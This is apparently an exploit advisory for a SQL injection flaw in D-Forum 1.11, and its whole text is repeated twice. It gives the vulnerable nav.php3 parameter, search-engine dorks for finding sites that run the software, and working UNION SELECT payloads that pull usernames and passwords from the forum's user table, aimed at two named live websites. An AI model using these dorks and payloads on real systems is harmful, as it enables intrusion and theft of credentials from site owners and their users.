D-Forum 1.11 SQL Injection Vulnerability
[o] D-Forum 1.11 SQL Injection Vulnerability
Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe
[o] Exploit
http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]
[o] Dork
"Powered by D-forum"
"nav.php3?page=voirsujet"
[o] PoC
http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe
[o] Exploit
http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]
[o] Dork
"Powered by D-forum"
"nav.php3?page=voirsujet"
[o] PoC
http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--